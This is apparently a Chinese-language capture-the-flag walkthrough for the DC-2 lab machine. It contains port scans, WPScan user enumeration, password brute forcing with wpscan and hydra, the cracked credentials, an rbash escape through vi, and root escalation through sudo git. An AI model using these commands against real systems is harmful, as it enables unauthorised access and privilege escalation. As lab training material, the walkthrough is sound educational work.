DC-2

信息收集

端口扫描

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.10 ((Debian))

############# all port ###############
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)

开放端口：80、7744
设置 hosts，访问 Web 页面：WordPress

WPScan 扫描

########## word theme ###########
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-02-25T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

WordPress version 4.7.10
WordPress theme in use: twentyseventeen

目录扫描

漏洞搜索

$searchsploit wordpress 4.7.1
$searchsploit wordpress akismet

Wordpress 4.7.1：用户名枚举

用户枚举&密码爆破

$wpscan --url http://dc-2 -e u 

admin
jerry
tom

wpscan --url http://dc-2 -U users.txt -P dict.txt

[i] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

将用户名密码 代入 SSH 测试

$hydra -L user.txt -P dict.txt ssh://172.16.252.134:7744
 
[7744][ssh] host: 172.16.252.134   login: tom   password: parturient

情报整理

##### 端口 ####
80：Apache 2.4.10
7744：OpenSSH 6.7p1

##### CMS ####
Wordpress 4.7.10
Wordpress Plugin akismet

##### user/passwd ####
Username: jerry, Password: adipiscing
Username: tom, Password: parturient

##### Web 后台 ####
jerry：adipiscing
tom：parturient

##### SSH ####
[7744][ssh] host: 172.16.252.134   login: tom   password: parturient

登录后台

除 Flag2 外，没有多少有用的信息

SSH 登录

$ssh -p 7744 tom

登录的 shell 为受限制的 rbash，使用 vi 绕过：

:set shell=/bin/bash
:shell

HOME 目录下得到 Flag3，cat、tail 命令不存在，但可以使用 less

信息收集

#### /etc/passwd ####
tom:x:1001:1001:Tom Cat,,,:/home/tom:/bin/rbash
jerry:x:1002:1002:Jerry Mouse,,,:/home/jerry:/bin/bash

#### 系统版本 ####
#### 内核版本 ####

HOME 下有个 usr 目录，其内是当前用户可以使用的 4 个命令，想到还有个 jerry 用户且还有对应的密码（不知可不可行），因为 4 个可用命令不包括 su 命令，这里脑子差点转不过来了，其实可以用 绝对路径 执行命令

$ /usr/bin/find / -iname su -type f 2>/dev/null

/bin/su

/bin/su jerry

提权

使用 jerry 的密码登录后，查看自己可以干什么(sudo -l)：

Matching Defaults entries for jerry on DC-2:                                     
    env_reset, mail_badpass,                                                     
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
                                                                                 
User jerry may run the following commands on DC-2:                               
    (root) NOPASSWD: /usr/bin/git

使用 git 提权：

$sudo git -p help
# or
$sudo git help config

Flag 找不找都无所谓了，重要的是这个渗透过程学到的技能